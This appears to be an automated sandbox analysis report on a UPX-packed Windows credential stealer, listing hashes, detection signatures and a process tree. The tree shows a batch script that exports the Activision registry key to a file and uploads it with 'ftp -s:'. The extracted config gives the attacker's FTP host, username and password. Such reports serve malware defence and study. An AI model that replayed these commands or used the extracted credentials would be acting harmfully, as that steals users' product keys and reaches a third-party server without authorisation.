49b4897dbd3e759714bd7b4f3b8fda54c45f15311bba7898b2db48ce151418ec

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
15/07/2024, 05:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4873267b4c87fc300cff179ac24e709c_JaffaCakes118.exe
Size

36KB
MD5

4873267b4c87fc300cff179ac24e709c
SHA1

c686cf54db0de278c03159b08f6cf73e413cdacc
SHA256

49b4897dbd3e759714bd7b4f3b8fda54c45f15311bba7898b2db48ce151418ec
SHA512

124c2e314982f4f8511dd4dd9e5fc7520d6978276f18972ac2bbefb97bc52417e7f703e7a3e5d9c112d11c9355d1d16ff7574c95ad60260a7eb5a46f7c6f78aa
SSDEEP

768:WCTuG0uKofu3KeSSfHywTv1yHOgkN5hOvR9TWBTDe1Z0KZl5+a/4wvQh6:FTufSLovcHRk3hgvWZtKZnp4wYh

Score

10^/10

upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
customer0005.freehostia.com
Port:
21
Username:
cuscus1
Password:
3927986

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2276-0-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral1/memory/2276-10-0x0000000000400000-0x000000000041D000-memory.dmp	upx

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 2704	2276	4873267b4c87fc300cff179ac24e709c_JaffaCakes118.exe	30
PID 2276 wrote to memory of 2704	2276	4873267b4c87fc300cff179ac24e709c_JaffaCakes118.exe	30
PID 2276 wrote to memory of 2704	2276	4873267b4c87fc300cff179ac24e709c_JaffaCakes118.exe	30
PID 2276 wrote to memory of 2704	2276	4873267b4c87fc300cff179ac24e709c_JaffaCakes118.exe	30
PID 2704 wrote to memory of 2816	2704	cmd.exe	32
PID 2704 wrote to memory of 2816	2704	cmd.exe	32
PID 2704 wrote to memory of 2816	2704	cmd.exe	32
PID 2704 wrote to memory of 2816	2704	cmd.exe	32
PID 2816 wrote to memory of 2832	2816	cmd.exe	33
PID 2816 wrote to memory of 2832	2816	cmd.exe	33
PID 2816 wrote to memory of 2832	2816	cmd.exe	33
PID 2816 wrote to memory of 2832	2816	cmd.exe	33
PID 2816 wrote to memory of 2920	2816	cmd.exe	34
PID 2816 wrote to memory of 2920	2816	cmd.exe	34
PID 2816 wrote to memory of 2920	2816	cmd.exe	34
PID 2816 wrote to memory of 2920	2816	cmd.exe	34
PID 2704 wrote to memory of 2708	2704	cmd.exe	35
PID 2704 wrote to memory of 2708	2704	cmd.exe	35
PID 2704 wrote to memory of 2708	2704	cmd.exe	35
PID 2704 wrote to memory of 2708	2704	cmd.exe	35
PID 2708 wrote to memory of 2680	2708	cmd.exe	36
PID 2708 wrote to memory of 2680	2708	cmd.exe	36
PID 2708 wrote to memory of 2680	2708	cmd.exe	36
PID 2708 wrote to memory of 2680	2708	cmd.exe	36
PID 2708 wrote to memory of 2908	2708	cmd.exe	37
PID 2708 wrote to memory of 2908	2708	cmd.exe	37
PID 2708 wrote to memory of 2908	2708	cmd.exe	37
PID 2708 wrote to memory of 2908	2708	cmd.exe	37
PID 2704 wrote to memory of 2780	2704	cmd.exe	38
PID 2704 wrote to memory of 2780	2704	cmd.exe	38
PID 2704 wrote to memory of 2780	2704	cmd.exe	38
PID 2704 wrote to memory of 2780	2704	cmd.exe	38
PID 2704 wrote to memory of 2788	2704	cmd.exe	39
PID 2704 wrote to memory of 2788	2704	cmd.exe	39
PID 2704 wrote to memory of 2788	2704	cmd.exe	39
PID 2704 wrote to memory of 2788	2704	cmd.exe	39
PID 2788 wrote to memory of 2688	2788	cmd.exe	40
PID 2788 wrote to memory of 2688	2788	cmd.exe	40
PID 2788 wrote to memory of 2688	2788	cmd.exe	40
PID 2788 wrote to memory of 2688	2788	cmd.exe	40
PID 2788 wrote to memory of 2200	2788	cmd.exe	41
PID 2788 wrote to memory of 2200	2788	cmd.exe	41
PID 2788 wrote to memory of 2200	2788	cmd.exe	41
PID 2788 wrote to memory of 2200	2788	cmd.exe	41
PID 2704 wrote to memory of 2904	2704	cmd.exe	42
PID 2704 wrote to memory of 2904	2704	cmd.exe	42
PID 2704 wrote to memory of 2904	2704	cmd.exe	42
PID 2704 wrote to memory of 2904	2704	cmd.exe	42
PID 2904 wrote to memory of 2716	2904	cmd.exe	43
PID 2904 wrote to memory of 2716	2904	cmd.exe	43
PID 2904 wrote to memory of 2716	2904	cmd.exe	43
PID 2904 wrote to memory of 2716	2904	cmd.exe	43
PID 2904 wrote to memory of 2756	2904	cmd.exe	44
PID 2904 wrote to memory of 2756	2904	cmd.exe	44
PID 2904 wrote to memory of 2756	2904	cmd.exe	44
PID 2904 wrote to memory of 2756	2904	cmd.exe	44
PID 2704 wrote to memory of 2580	2704	cmd.exe	45
PID 2704 wrote to memory of 2580	2704	cmd.exe	45
PID 2704 wrote to memory of 2580	2704	cmd.exe	45
PID 2704 wrote to memory of 2580	2704	cmd.exe	45

C:\Users\Admin\AppData\Local\Temp\4873267b4c87fc300cff179ac24e709c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\4873267b4c87fc300cff179ac24e709c_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2276
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Users\Admin\AppData\Local\Temp\a93777.bat "C:\Users\Admin\AppData\Local\Temp\4873267b4c87fc300cff179ac24e709c_JaffaCakes118.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c echo exit|cmd /q /k"prompt $D $T"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo exit"
      4⤵
      PID:2832
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /q /k"prompt $D $T"
      4⤵
      PID:2920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c echo.|date
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo."
      4⤵
      PID:2680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" date"
      4⤵
      PID:2908
- - C:\Windows\SysWOW64\reg.exe
    REG EXPORT HKEY_LOCAL_MACHINE\SOFTWARE\Activision\ C:\15-07-2024_--_Key.txt
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c echo exit|cmd /q /k"prompt $D $T"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo exit"
      4⤵
      PID:2688
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /q /k"prompt $D $T"
      4⤵
      PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c echo.|date
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo."
      4⤵
      PID:2716
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" date"
      4⤵
      PID:2756
- - C:\Windows\SysWOW64\ftp.exe
    ftp -s:C:\Users\Admin\AppData\Local\Temp\sendtoftp.log
    3⤵
    PID:2580

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\a93777.bat

Filesize
2KB

MD5
7c15a66f05f333b18f71f59271e2820c

SHA1
aa30c1d05bee3f4d8c816bbe28a1e93c7a8d058c

SHA256
2dc5c3db2e53842d8f3428be67a181710f2b56535b0d2d7ca410d196178308cd

SHA512
e73482ea92f4940926dbcfc72fc3e03ed20a80eb6ba940ae21b8523392e6f01a0621a36f73a6bd13eb7b16847c7536fc5477a7c957cae63e2f769bfbc6b980e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\sendtoftp.log

Filesize
87B

MD5
3dc9c34ff7917641131391a07f020ce2

SHA1
9c989ad66ce7e42335114bb63d757042601c5dd8

SHA256
1389a1601301b02ab23ef4508776dec3d900122759e0e403eccf0344e9ac7759

SHA512
eef96eb69fbc8952e115af761098cd190b3ca2b6b86eac24369b47dd8d7ccd75c808b2cc307ca021d7cd04ea4ca509689420e68f95e9b87da3c2ff4a08be7204

Download Submit
memory/2276-0-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/2276-10-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads